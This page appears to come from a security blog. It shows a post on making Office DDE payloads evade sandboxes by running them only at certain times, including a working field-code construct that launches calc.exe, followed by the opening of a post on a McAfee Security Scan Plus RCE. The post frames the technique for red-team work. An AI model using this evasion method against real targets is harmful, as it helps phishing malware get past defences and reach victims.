Here’s a little trick we’d like to share in the end-of-year rush:

DDE is the new black: malware authors quickly adopted the technique, and so did pentesters and red teams in order to simulate the latest attacks. In our experience, trivial DDE payloads (like fully readable PowerShell scripts) slip through conventional detections, but process monitoring can cause some headache: powershell.exe launched from Office is surely an obvious indicator of something phishy.

Malware sandboxes (that execute incoming files in virtualized environments to learn more about their purpose) are an example of defensive tools that implement such detection. And although they are commonly seen as all-in-one APT stoppers, these tools are in fact quite limited in terms of simulating an actual target, which provides a broad avenue for bypasses. Evasion is generally performed by conditional checks that determine if the payload would run in the right domain, timezone, etc. If the condition is not met, the payload remains dormant, so the instrumentation in the sandbox won’t catch anything suspicious.

So how do we implement this with DDE? Looking at some public obfuscation techniques, it’s easy to spot the IF field code, which allows conditional parsing of other fields in the document. We can combine this with the DATE or TIME codes to construct a document with time-based execution:

{SET P {IF {TIME \@ "m"} > 13 "C:\\Windows\\System32\\calc.exe" ""}}
{DDEAUTO {REP P} "s2"}

The above DDE construct only executes calc.exe if the minutes of the hour are past 13. Suppose you send your attachments during the night, with a payload that only executes after 9:00 AM – by the time someone opens the bait, the analyzer has already marked it safe hours ago. Or better yet, you can rely on the resource constraints of the sandbox and make it cache/whitelist your first shot before you send the rest. These methods can be further refined with the use of fields like USERNAME or even FILENAME.

By the way, is DDE Turing-complete?


Notes on McAfee Security Scan Plus RCE (CVE-2017-3897)

Author: b

At the end of last month, McAfee published a fix for a remote code execution vulnerability in its Security Scan Plus software. Beyond Security, whom we worked with for vulnerability coordination, published the details of the issue and our PoC exploit on their blog. While the vulnerability itself got some attention due to its frightening simplicity, this is not the first time SSP has contained similarly dangerous problems, and it’s certainly not the last. In this post, I’d like to share some additional notes about the wider context of the issue.
